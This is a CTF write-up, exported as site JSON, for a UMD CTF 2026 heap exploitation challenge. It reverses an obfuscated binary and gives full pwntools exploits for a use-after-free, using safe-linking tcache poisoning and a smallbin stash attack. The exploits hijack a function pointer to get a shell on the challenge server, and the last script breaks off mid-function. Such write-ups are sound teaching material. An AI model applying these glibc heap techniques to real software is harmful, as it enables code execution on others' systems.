
[{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/","section":"","summary":"","title":"","type":"page"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/","section":"CTFs","summary":"","title":"CTFs","type":"ctfs"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/heap/","section":"Tags","summary":"","title":"Heap","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/obfuscation/","section":"Tags","summary":"","title":"Obfuscation","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/topics/pwn/","section":"Topics","summary":"Binary exploitation and memory corruption challenges.","title":"Pwn","type":"topics"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/safe-linking/","section":"Tags","summary":"","title":"Safe-Linking","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/smallbin-attack/","section":"Tags","summary":"","title":"Smallbin-Attack","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/tcache-poisoning/","section":"Tags","summary":"","title":"Tcache-Poisoning","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/topics/","section":"Topics","summary":"Browse writeups by category.","title":"Topics","type":"topics"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/uaf/","section":"Tags","summary":"","title":"Uaf","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/umd-26/","section":"CTFs","summary":"","title":"UMD CTF 2026","type":"ctfs"},{"content":" the house tightened the 
rules\nnc challs.umdctf.io 30304 First contact # Connect; eight options, vaguely casino-themed:\nwelcome to the velvet table. house policy: all sales final. table marker: 0x7c4f1b2e 1) reserve 2) cashout 3) update 4) inspect 5) dealer-note 6) payout 7) settle-ledger 8) leave \u0026gt; The \u0026ldquo;table marker\u0026rdquo; line is interesting: it prints once on startup and never appears again. Set it aside; almost certainly a leak we\u0026rsquo;ll have to come back to.\nA few minutes of poking the menu narrows the action set down to roughly: reserve asks for a seat (0..15) and a size, mallocs, prints the heap pointer; cashout frees a seat; update writes into one; inspect dumps it back, but obfuscated. The other four are weirder.\nReverse triage # Checksec:\nArch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled No canary, full RELRO, PIE. system is in the imports, and the binary contains:\nint win() { puts(\u0026#34;yay.\u0026#34;); return system(\u0026#34;/bin/sh\u0026#34;); } So we don\u0026rsquo;t need a libc leak; we just need to call win. North star.\nOpen main in IDA and you\u0026rsquo;re greeted by a wall of XOR\u0026rsquo;d reads/writes, rotates, mixed indices, and bizarre per-iteration key derivations. Resist the temptation to start decoding any of it. The whole pile is, at the end of the day, a heap challenge, so the only thing that matters initially is which menu options touch which heap region, which can free, which can write, which can read.\nUnder the obfuscation there\u0026rsquo;s a 16-element .bss array of records:\nstruct Table { void *ptr; size_t size; int occupied; }; Table tables[16]; Every handler indexes it by a permuted seat number: idx = ((seat ^ v51) + 3) \u0026amp; 0xF. v51 is one of the XOR-derived constants; just a permutation, ignore it. 
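As a quick sanity check, the seat permutation really is a bijection on 0..15, so no two seats can alias one record. A hedged sketch (v51 is derived at runtime; the 7 below is an arbitrary stand-in, and any 4-bit value behaves the same):

```python
# Sketch: idx = ((seat ^ v51) + 3) & 0xF permutes 0..15 for any fixed
# 4-bit v51. The real v51 is XOR-derived at runtime; 7 is a stand-in.
def seat_index(seat, v51=7):
    return ((seat ^ v51) + 3) & 0xF

indices = [seat_index(s) for s in range(16)]
assert sorted(indices) == list(range(16))  # bijective: no seat collisions
```

XOR with a constant and addition mod 16 are each invertible, so the composition is too; that is why the permutation can be safely ignored during triage.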
Walking the switch cases.\nreserve # size = get_num(); if (size - 0x80 \u0026gt; 0x100) { puts(\u0026#34;size rejected.\u0026#34;); break; } // 0x80 \u0026lt;= size \u0026lt;= 0x180 if (tables[idx].occupied) { puts(\u0026#34;seat occupied.\u0026#34;); break; } void *p = malloc(size); tables[idx].ptr = p; if (size == 0x100) { if (tcache_ctr_0x100) tcache_ctr_0x100--; } else if (size == 0x180) { if (tcache_ctr_0x180) tcache_ctr_0x180--; } idk_count += 2; tables[idx].size = size; tables[idx].occupied = 1; __printf_chk(1, \u0026#34;reservation confirmed: %p\\n\u0026#34;, p); // heap leak malloc, store, print the pointer (heap leak). Sizes clamped to [0x80, 0x180]. Two per-size counters decrement when the request matches; we\u0026rsquo;ll see the matching increment in cashout.\ncashout # free(tables[idx].ptr); tables[idx].occupied = 0; size = tables[idx].size; if (size == 0x100) { v38 = tcache_ctr_0x100; v39 = \u0026amp;tcache_ctr_0x100; } else if (size == 0x180) { v38 = tcache_ctr_0x180; v39 = \u0026amp;tcache_ctr_0x180; } else goto out; // \u0026lt;-- pointer never zeroed if (v38 \u0026lt;= 6) { *v39 = v38 + 1; tables[idx].ptr = NULL; } out: ++idk_count; puts(\u0026#34;cashed out.\u0026#34;); Mirror of reserve: free, bump the size-matched counter, null the pointer. The goto out for non-matching sizes is going to matter.\nupdate # length = get_num(); if (length - 1 \u0026gt; 0x3FF) { puts(\u0026#34;length rejected.\u0026#34;); break; } // bounded vs 0x400, NOT vs chunk size get_data(scratch, length); if (settled) { memcpy(tables[idx].ptr, scratch, length); } else { char v40 = (((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0xD9) \u0026amp; 1; for (i = 0; i \u0026lt; length; ++i) { if ((v40 \u0026amp; 1) == 0) ((char *)tables[idx].ptr)[i] = scratch[i]; // every other byte ++v40; } } Two write modes. Pre-settle: every other byte lands; the rest is left at its previous value. 
Post-settle: clean memcpy with no bound on the chunk\u0026rsquo;s actual size, only on length itself.\ninspect # size_capped = min(0x40, tables[idx].size); v15 = 0; for (i = 0; i \u0026lt; size_capped; ++i) { char k = __ROL4__(v15 ^ v49 ^ (0x45D9F3B * v43), (v43 + i) \u0026amp; 7); putchar(((char *)tables[idx].ptr)[i] ^ k); v15 += 0x9E37; } XOR-stream cipher, capped to 0x40 bytes per call. The key derives from v49 and v43, both functions of \u0026amp;thing. Once we have the marker we can decode this client-side.\ndealer-note # if (idk_count \u0026lt;= 4 || (action_count \u0026amp; 3) != 0) { puts(\u0026#34;dealer busy.\u0026#34;); break; } get_data(scratch, 0x20); for (i = 0; i \u0026lt; 0x20; ++i) { v37 = v6 ^ v49; v6 += 0x27D4EB2D; ((char *)\u0026amp;thing)[i] = scratch[i] ^ (107 * (BYTE2(v37) ^ v37)); } Direct write into the start of thing \u0026ndash; a stack-local struct in main\u0026rsquo;s frame, more on it below. 32 bytes, XOR-decoded, gated on the action counters.\npayout # if (idk_count \u0026amp; 1) { if (thing.hash == ((u64)thing.func ^ v47 ^ \u0026#39;house_ed\u0026#39;)) thing.func(); else puts(\u0026#34;house edge.\u0026#34;); } else { puts(\u0026#34;payout locked.\u0026#34;); } Calls a stack-local function pointer if a tagged-pointer integrity check passes, and only when idk_count is odd. This is the win primitive. Rewrite thing.func to point at win and thing.hash to the matching tag, manage parity, and payout calls anything.\n(idk_count is my placeholder name for an opaque counter the handlers all bump. Nothing actually reads its magnitude; only settle\u0026rsquo;s \u0026gt; 6 check and payout\u0026rsquo;s parity gate do anything with it. Looks like more obfuscation, treated as such.)\nsettle-ledger # if (idk_count \u0026lt;= 6) puts(\u0026#34;ledger mismatch.\u0026#34;); else { puts(\u0026#34;ledger settled.\u0026#34;); settled = 1; } Flips settled once the counter passes 6. Three reserves and a cashout get there.\nleave # return from main. 
Trivial.\nthe stack struct # The struct dealer-note writes into and payout calls through is laid out in main\u0026rsquo;s frame as:\nstruct { uint64_t prev_size; // 0 uint64_t size; // 0x111 uint64_t fd; // 0 uint64_t bk; // 0 void (*func)(void); // = ticket_rejected uint64_t hash; // = func ^ key ^ \u0026#39;house_ed\u0026#39; } thing; The func/hash pair is the win primitive: rewrite both consistently and payout calls whatever func is. The first four fields read like the start of a malloc chunk header; that becomes relevant for the intended path.\n'house_ed' is the C multi-character constant 0x686F7573655F6564, just a fixed 8-byte literal. The key mixed into the hash is one of those XOR-derived values we said we\u0026rsquo;d ignore for now.\nPulling it together \u0026ndash; three benign primitives and three bugs:\nreserve leaks a heap pointer. inspect is our read primitive, stream cipher we can undo client-side. payout calls thing.func if the tagged-pointer hash matches and idk_count is odd. Cashout: the size check is inverted. reserve decrements the per-size counters; cashout only bumps them and nulls the pointer when the size matches 0x100 or 0x180. Every other size in [0x80, 0x180] falls through goto out with the pointer never nulled \u0026ndash; one cashout on a 0x80 chunk is a clean UAF. Update: split personality. Pre-settle only every other byte lands; post-settle it\u0026rsquo;s a clean memcpy bounded only on input length (vs 0x400), not the chunk size. Step one of every exploit is calling settle, which needs idk_count \u0026gt; 6 \u0026ndash; four reserves get there. Dealer-note: 32 bytes written directly into the start of thing. That covers prev_size/size/fd/bk, not func/hash. The only handler that touches the stack struct\u0026rsquo;s chunk header without first having a heap pointer aimed there. The plan, in outline: write thing.func/thing.hash, then call payout. Both paths boil down to that; they only differ in how they construct the alias. 
Dealer-note can\u0026rsquo;t reach func (only the first 32 bytes), so we need a heap pointer aimed at \u0026amp;thing and use update through it. Constructing that aliasing pointer is the rest of the challenge.\nThe marker is a stack leak # Back to that line on startup. It comes from:\nprintf(\u0026#34;table marker: 0x%08x\\n\u0026#34;, ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x9AC90307); Reading the format: %08x prints 32 bits, fed ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x9AC90307. Undo the XOR and we have the bottom 32 bits of \u0026amp;thing \u0026gt;\u0026gt; 4, i.e. bits 4..35 of \u0026amp;thing. The bottom nibble is always 0 (16-byte stack alignment), so we recover bits 4..35 directly; what\u0026rsquo;s missing is bits 36..47 (12 bits at the top).\nIn practice on Linux x86-64 user-space, those top bits are always 0x7ff for a stack address \u0026ndash; I\u0026rsquo;ve never seen otherwise. So we just hardcode it:\nru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | table_marker # full \u0026amp;thing We have \u0026amp;thing. Combined with payout calling thing.func, the rough plan writes itself: get a heap pointer aimed at \u0026amp;thing, write through it, call payout. The how is the rest of the challenge.\nDecoding the keys # Now we go back and look at all the XOR muck. Reading carefully through main, every per-menu stream cipher and integrity tag derives from one of three values, and each of those derives from \u0026amp;thing \u0026gt;\u0026gt; 4:\nkey1 = ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9; // 32-bit, used in inspect / dealer-note / payout key2 = (((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF; // 4-bit, seat permutation key3 = (u64)key1 \u0026lt;\u0026lt; 32; // top half of payout\u0026#39;s tagged-pointer key In English: knowing the marker means knowing every key in the binary. 
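To make the recovery concrete, here is a sketch that decodes the marker value shown in the banner above (0x7c4f1b2e); that session is long gone, so the resulting address is purely illustrative:

```python
# Undo the XOR on the printed 32-bit marker, shift back into place, and
# patch in the 0x7ff top bits that user-space stacks carry on x86-64.
MARKER_XOR = 0x9AC90307
marker = 0x7C4F1B2E                      # value from the banner above
low_bits = (marker ^ MARKER_XOR) << 4    # bits 4..35 of the stack address
stack_addr = (0x7FF << 36) | low_bits
assert stack_addr == 0x7FFE68618290
assert (stack_addr >> 4) & 0xFFFFFFFF == marker ^ MARKER_XOR
```

The bottom nibble comes back as 0 for free (16-byte alignment), so the only guessed component is the hardcoded 0x7ff prefix.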
There\u0026rsquo;s no brute force or pen-and-paper anywhere. Decoding inspect / dealer-note / payout is just a few lines of Python each; the read primitive\u0026rsquo;s cipher is folded out below, and the rest follow the same shape.\nStream cipher behind inspect Each output byte is:\nkey2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15 = 0 out = b\u0026#34;\u0026#34; for i, byte in enumerate(raw_bytes): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF The two pitfalls are (a) __ROL4__ in IDA is rotate-left 32-bit, not 64-bit, and (b) the assignment in the binary is s = (char)(byte ^ rol32_result), so only the low byte of the rolled value participates. inspect is also size-capped at 0x40 bytes per call \u0026ndash; enough for everything we need.\nEasy path: tcache poison through the size hole # Anything in [0x80, 0x180] other than the two protected sizes is a UAF on the very first cashout. With UAF on a tcache chunk, this is a textbook safe-linking poison (assumes glibc 2.32+; confirmed empirically). Pick 0x80, chunk size 0x90, tcache bin [0x90]:\ndef prot_ptr(pos, target): return (pos \u0026gt;\u0026gt; 12) ^ target reserve(4, 0x80) # extra: bumps idk_count past settle\u0026#39;s threshold of 6 reserve(3, 0x80) pos = reserve(0, 0x80) cashout(3); cashout(0) # tcache[0x90] count = 2 (bin indexed by chunk size, not request) settle() update(0, 8, p64(prot_ptr(pos, stack_addr))) reserve(1, 0x80) # pops `pos`, freelist head -\u0026gt; stack reserve(2, 0x80) # pops stack; tables[2].ptr aliases the stack struct Two cashouts because tcache_get only consults the freelist while count \u0026gt; 0: the first reserve drops the count to 1 and pops pos, the second drops it to 0 and pops our forged target.\nAfter step 5 above, tables[2].ptr is the stack struct\u0026rsquo;s address. 
inspect(2) reads through the alias, and offset 0x20 lands on func (still ticket_rejected):\nRead offset Stack-struct field 0x00 prev_size 0x08 size (0x111) 0x10 fd 0x18 bk 0x20 func (still ticket_rejected) 0x28 hash PIE leak, then write the matching (func, hash) pair through the alias and call payout:\ncontent = inspect(2) elf.address = uu64(content[0x20:0x28]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(2, 0x30, b\u0026#34;A\u0026#34; * 0x20 + p64(win) + p64(win_hash)) payout() Done. About ten menu actions, no obfuscation worse than safe-linking and the reverse of inspect\u0026rsquo;s stream cipher.\nWhat was supposed to happen # Look at the cashout snippet again. The shape of the protection \u0026ndash; per-size counter saturating at 7, only nulling while the counter is below threshold \u0026ndash; only makes sense as a tcache fill tracker. Once tcache for a given size is full, further frees go to the unsorted bin and the counter freezes. The dev wanted to hand you UAF specifically on an unsorted-bin chunk for sizes 0x100 and 0x180. 
Those two are arbitrary picks among the binary\u0026rsquo;s smallbin-eligible range \u0026ndash; chunk sizes need to be larger than the 0x80 fastbin cap and smaller than the 0x420 largebin floor, but anything in that band would work.\nCombined with dealer-note (which writes the first 0x20 bytes of the stack struct \u0026ndash; exactly prev_size/size/fd/bk), the binary is staged for a smallbin attack against the stack: free a smallbin-sized chunk into the unsorted bin via the intentional UAF, sort it into a smallbin with a follow-up allocation, then forge the stack as a fake bin neighbour and trigger an unlink.\nThe intended check should have looked something like:\nif (size != 0x100 \u0026amp;\u0026amp; size != 0x180) { tables[idx].ptr = NULL; // unsupported sizes: always null, no UAF goto out; } if (v38 \u0026lt;= 6) { // supported sizes: only null while tcache has room *v39 = v38 + 1; tables[idx].ptr = NULL; } Instead the check is inverted: unsupported sizes fall through to goto out without the null. The intended bug was one specific UAF; the implementation produced a dozen.\nIntended path: smallbin attack via dealer-note # Now the proper route. The story:\nSet up so we get UAF on a chunk that\u0026rsquo;s about to land in smallbin [0x110]. Use that UAF to make the bin\u0026rsquo;s tail point at the stack struct. Use dealer-note to forge the stack struct so the smallbin\u0026rsquo;s consistency check accepts it. Trigger a malloc(0x100) \u0026ndash; the smallbin allocator unlinks our victim, then a follow-up loop puts the stack struct into tcache. A further malloc(0x100) pops the stack struct out of tcache, returning a \u0026ldquo;user pointer\u0026rdquo; that lands inside it. Solid arrows in the diagrams are fd, dashed arrows are bk. 
Smallbins are circular doubly-linked lists.\nOne pragmatic note before the steps: the server cuts the connection on a wall-clock timer, and this path runs sixteen reserves and eight cashouts plus all the inspect/update/dealer-note/settle/payout actions. Three round-trip sendlineafter calls per menu action (one per prompt) misses the window. Every helper in the final exploit batches the whole interaction into a single sendafter, like:\ndef reserve(seat, size): sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;1\\n{seat}\\n{size}\\n\u0026#34;.encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) A few hundred ms saved per action is the difference between a stable shell and a connection that closes mid-cat. Even with batched writes the post-payout window is tight, so the final exploit also pre-queues ls and cat ./flag.txt as sendlines before going interactive. The easy path is short enough that round-trip sendlineafter still fits; only the intended chain feels the timer.\nStep 1: stage the unsorted-bin UAF # Saturate the 0x100 cashout counter, then do one more cashout:\nfor i in range(7): reserve(15 - i, 0x100) # warm bodies that will fill tcache pos = reserve(0, 0x100) # the chunk we\u0026#39;ll preserve a pointer to reserve(8, 0x180) # guard against top-chunk consolidation for i in range(7): cashout(15 - i) # tcache_ctr_0x100 saturates at 7 cashout(0) # 8th cashout: ptr stays valid, chunk -\u0026gt; unsorted Heap state:\nflowchart LR TC[\"tcache[0x110]count = 7\"] --\u003e T0[\"chunk\"] --\u003e T1[\"chunk\"] --\u003e Tdots[\"...four more...\"] --\u003e T6[\"chunk\"] UB[\"unsorted bin\"] --\u003e|fd| C[\"chunk C(seat 0, dangling)\"] C --\u003e|fd| UB C -.-\u003e|bk| UB UB -.-\u003e|bk| C style C fill:#ff6b6b,color:#fff style UB fill:#868e96,color:#fff We hold a usable pointer into C (its user data starts at pos) even though malloc considers it free. 
The 0x180 reserve at seat 8 sits between C and the wilderness; without it, freeing seat 0 would consolidate forward into the top chunk instead of going to the unsorted bin.\nStep 2: sort C into the smallbin # Any allocation that the unsorted bin can\u0026rsquo;t service will walk it, sorting C out into the right bin. The 0x180 reserve is convenient for this \u0026ndash; it\u0026rsquo;s not 0x110, so C gets pushed out:\nreserve(7, 0x180) _int_malloc walks unsorted, sees C (size 0x110), can\u0026rsquo;t use it for this 0x180 request, sorts it into smallbin [0x110]:\nflowchart LR BIN[\"smallbin[0x110](bin head in libc arena)\"] --\u003e|fd| C[\"chunk Cfd = bin_headbk = bin_head\"] C --\u003e|fd| BIN C -.-\u003e|bk| BIN BIN -.-\u003e|bk| C style C fill:#ff6b6b,color:#fff style BIN fill:#868e96,color:#fff Both C-\u0026gt;fd and C-\u0026gt;bk point at the bin sentinel in libc. inspect(0) reads C-\u0026gt;fd:\nbin_head = uu64(inspect(0)[0:8]) # libc bin sentinel Step 3: forge the fake \u0026ldquo;next chunk\u0026rdquo; on the stack # Smallbin allocation pops the bin\u0026rsquo;s tail (bin-\u0026gt;bk), and on the way out it walks one further hop via victim-\u0026gt;bk and stashes that hop into tcache via the so-called tcache-stash loop. We want that one-further hop to land on the stack struct.\nThe next allocation will run two checks against the stack struct:\nvictim = last(bin); // C bck = victim-\u0026gt;bk; // we\u0026#39;ll be making this \u0026amp;thing if (bck-\u0026gt;fd != victim) abort(); // (1) so \u0026amp;thing.fd MUST equal C ... tc_victim = last(bin); // \u0026amp;thing (after the line above sets bin-\u0026gt;bk = bck) bck = tc_victim-\u0026gt;bk; // (2) we want this = bin_head, so the loop terminates Translation: *(stack_addr + 0x10) (the fd slot of the stack struct) must equal C\u0026rsquo;s chunk address (pos - 0x10), and *(stack_addr + 0x18) (the bk slot) must equal bin_head. 
The prev_size and size slots aren\u0026rsquo;t read on this path, but the binary already initialises them to a reasonable header so we just preserve it:\nblock-beta columns 2 a[\u0026#34;+0x00prev_size = 0\u0026#34;] b[\u0026#34;+0x08size = 0x111\u0026#34;] c[\u0026#34;+0x10fd = pos - 0x10(satisfies bck-\u003efd check)\u0026#34;] d[\u0026#34;+0x18bk = bin_head(terminates stash loop)\u0026#34;] e[\u0026#34;+0x20func(unchanged for now)\u0026#34;] f[\u0026#34;+0x28hash(unchanged for now)\u0026#34;] style c fill:#51cf66,color:#fff style d fill:#51cf66,color:#fff dealer-note writes exactly the first 0x20 bytes \u0026ndash; the four header fields above \u0026ndash; and nothing further. That\u0026rsquo;s why it exists in the binary at all:\nfake_chunk = p64(0) + p64(0x110 | 1) + p64(pos - 0x10) + p64(bin_head) dealer_note(fake_chunk) settle() Step 4: link the stack into the smallbin via the UAF # Right now the smallbin only knows about C. We need C-\u0026gt;bk to lie and say \u0026ldquo;the next chunk is the stack region\u0026rdquo;. update after settle is a clean memcpy:\nupdate(0, 0x10, p64(bin_head) + p64(stack_addr)) (We rewrite fd too with the same value libc already had there. Only bk matters for the attack.)\nState now \u0026ndash; the bin head still believes the chain is just bin \u0026lt;-\u0026gt; C, but C has been told that its bk neighbour is the stack:\nflowchart LR BIN[\u0026#34;smallbin[0x110](libc)\u0026#34;] --\u003e|fd| C[\u0026#34;chunk Cfd = bin_headbk = stack_addr ✗\u0026#34;] C --\u003e|fd| BIN BIN -.-\u003e|bk| C C -.-\u003e|bk| S[\u0026#34;fake stack chunkfd = pos - 0x10 (= C)bk = bin_head\u0026#34;] S -.-\u003e|bk| BIN S --\u003e|fd| C style C fill:#ff6b6b,color:#fff style S fill:#51cf66,color:#fff style BIN fill:#868e96,color:#fff The dashed bk chain now reads: BIN \u0026lt;- C \u0026lt;- stack \u0026lt;- BIN, three hops instead of two \u0026ndash; glibc thinks the smallbin has two chunks. The solid fd chain libc walks from the head still goes BIN -\u0026gt; C -\u0026gt; BIN, because we never had the means to corrupt bin-\u0026gt;fd (it\u0026rsquo;s in libc\u0026rsquo;s arena).
The lie is one-sided.\nThat asymmetry is exactly what the smallbin allocator falls for. It only walks bk hops one step and only validates one hop deep \u0026ndash; it asks bck-\u0026gt;fd == victim?, doesn\u0026rsquo;t ask bin-\u0026gt;fd == victim or anything more thorough. Our forged stack.fd = C makes the one check it does run pass.\nStep 5: trigger the smallbin allocation # Drain the 0x110 tcache so the next malloc(0x100) has to use the smallbin path:\nfor i in range(7): reserve(15 - i, 0x100) # tcache_ctr_0x100 -\u0026gt; 0 Then trigger:\nreserve(0, 0x100) Inside _int_malloc\u0026rsquo;s smallbin path:\nvictim = last(bin); // C bck = victim-\u0026gt;bk; // stack_addr if (bck-\u0026gt;fd != victim) abort(); // stack.fd == C, passes ✓ bin-\u0026gt;bk = bck; // bin-\u0026gt;bk = stack_addr bck-\u0026gt;fd = bin; // stack.fd \u0026lt;- bin_head (clobbers our forged fd) /* tcache stash loop runs once */ tc_victim = last(bin); // stack_addr bck = tc_victim-\u0026gt;bk; // stack.bk == bin_head bin-\u0026gt;bk = bck; // last(bin) == bin -\u0026gt; next iter exits tcache_put(tc_victim, idx); // stack_addr -\u0026gt; tcache[0x110] return chunk2mem(victim); // returns C Three writes happen we didn\u0026rsquo;t have direct control over, none of them matter: the two bin-\u0026gt;bk writes both update libc\u0026rsquo;s arena, and the stack.fd \u0026lt;- bin_head write clobbers our forged-but-already-used fd slot. After this:\nflowchart LR TC[\"tcache[0x110]count = 1\"] --\u003e S[\"stack_addr(stashed by smallbin loop)\"] style S fill:#51cf66,color:#fff Step 6: pop the stack out of tcache # Next malloc(0x100) pops it directly:\nreserve(1, 0x100) # tables[1].ptr = chunk2mem(stack_addr) = stack_addr + 0x10 tables[1].ptr lands at stack_addr + 0x10, which is the fd slot of the stack struct. 
Reading offset 0x10 past that pointer hits func:\nRead offset Stack-struct field 0x00 fd (now bin_head, clobbered by the unlink) 0x08 bk (now bin_head from the stash loop) 0x10 func (still ticket_rejected) 0x18 hash PIE leak, then write through:\ncontent = inspect(1) elf.address = uu64(content[0x10:0x18]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(1, 0x20, b\u0026#34;A\u0026#34; * 0x10 + p64(win) + p64(win_hash)) cashout(15) # parity bump for payout payout() Final exploits # Full solve.py for the unintended tcache poison from pwn import * elf = context.binary = ELF(\u0026#34;./velvet-table\u0026#34;) def ru(*a, **k): return p.recvuntil(*a, **k, drop=True) def rl(*a, **k): return p.recvline(*a, **k, keepends=False) def sla(*a, **k): return p.sendlineafter(*a, **k) def sa(*a, **k): return p.sendafter(*a, **k) def sl(*a, **k): return p.sendline(*a, **k) def uu64(d): return u64(d.ljust(8, b\u0026#34;\\0\u0026#34;)) def prot_ptr(pos, ptr): return (pos \u0026gt;\u0026gt; 12) ^ ptr p = remote(\u0026#34;challs.umdctf.io\u0026#34;, 30304) ru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | table_marker key1 = (stack_addr \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9 def reserve(seat, size): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;1\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()); sla(b\u0026#34;size: \u0026#34;, str(size).encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) def cashout(seat): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;2\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) def update(seat, length, data): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;3\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) sla(b\u0026#34;length: \u0026#34;, str(length).encode()); 
sa(b\u0026#34;data:\\n\u0026#34;, data) def settle(): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;7\u0026#34;) def payout(): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;6\u0026#34;) def inspect(seat): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;4\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) res = ru(b\u0026#34;\\n1)\u0026#34;) key2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15, out = 0, b\u0026#34;\u0026#34; for i, byte in enumerate(res): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF return out reserve(4, 0x80) # extra: bumps idk_count past settle\u0026#39;s threshold reserve(3, 0x80) pos = reserve(0, 0x80) cashout(3); cashout(0) # tcache[0x90] count = 2 settle() update(0, 8, p64(prot_ptr(pos, stack_addr))) reserve(1, 0x80) # pops original chunk, freelist head -\u0026gt; stack reserve(2, 0x80) # pops stack address content = inspect(2) elf.address = uu64(content[0x20:0x28]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(2, 0x30, b\u0026#34;A\u0026#34; * 0x20 + p64(win) + p64(win_hash)) payout() sl(b\u0026#34;cat ./flag.txt\u0026#34;) p.interactive() Full solve.py for the intended smallbin attack from pwn import * elf = context.binary = ELF(\u0026#34;./velvet-table\u0026#34;) def ru(*a, **k): return p.recvuntil(*a, **k, drop=True) def rl(*a, **k): return p.recvline(*a, **k, keepends=False) def sa(*a, **k): return p.sendafter(*a, **k) def sl(*a, **k): return p.sendline(*a, **k) def uu64(d): return u64(d.ljust(8, b\u0026#34;\\0\u0026#34;)) p = remote(\u0026#34;challs.umdctf.io\u0026#34;, 30304) ru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | 
table_marker key1 = (stack_addr \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9 action_count = 0 def reserve(seat, size): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;1\\n{seat}\\n{size}\\n\u0026#34;.encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) def cashout(seat): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;2\\n{seat}\\n\u0026#34;.encode()) def update(seat, length, data): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;3\\n{seat}\\n{length}\\n\u0026#34;.encode() + data) def settle(): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;7\\n\u0026#34;) def payout(): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;6\\n\u0026#34;) def inspect(seat): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;4\\n{seat}\\n\u0026#34;.encode()) res = ru(b\u0026#34;\\n1) reserve\u0026#34;) key2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15, out = 0, b\u0026#34;\u0026#34; for i, byte in enumerate(res): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF return out def dealer_note(note): global action_count v6 